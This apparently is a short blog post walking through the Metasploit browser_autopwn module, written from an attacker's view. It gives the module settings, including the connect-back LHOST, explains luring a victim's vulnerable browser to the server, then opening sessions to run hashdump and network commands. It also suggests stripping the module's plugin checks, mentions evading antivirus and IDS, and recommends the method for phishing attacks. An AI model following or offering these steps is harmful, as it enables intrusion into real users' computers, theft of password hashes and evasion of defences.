At the Defcon conference this year a new exploit was provided to the open source hacking community (Thanks to Egypt - Thank You), which allows one to fingerprint the victims browser/OS and patch levels prior to sending the exploit. Previously the exploit was chartered as a Cluster Bomb but is now known more of a guided missile.I was able to test this exploit against a vulnerable microshaft IE 6.0.3 browser this afternoon and the payload exploited with out a hitch! If you like watching videos here is a good proof of concept you can develop your future exploits from off of youtube:
(PaulDotCom Enterprises, LLC)
http://www.youtube.com/watch?v=FwBDTg7W1wY
Just run the Metasploit console and load the /auxiliary/server/browser_autopwn exploit module then set values for:
LHOST (IP victim will connect back to)
SRVPORT (port to run exploit on, can be 80 or 443 HTTPS)
URIPATH (directory to host exploit from)
run exploit, connect from victims vulnerable browser to http://
Test:
sessions -l (session ids should list)
sessions -i (session id), then type: hashdump, ipconfig /all, ifconfig -a (what ever)
if not then try again. I had some problems when the browser sent a response the server didn't know how to respond to (sent RST and 404 message back to client usually when victims browsers doesn't have a plugin installed), like apple quicktime, java or something like that). Take out those checks done by the exploit in the ruby code and you might have some success!!! I didn't test with a anti-virus scanner installed, but I have heard it can bypass/evade some of the scanners and generic IDS rules based on how you submit your exploit to the victim. This is definitely an effective means of getting inside through a phishing attack.
No comments:
Post a Comment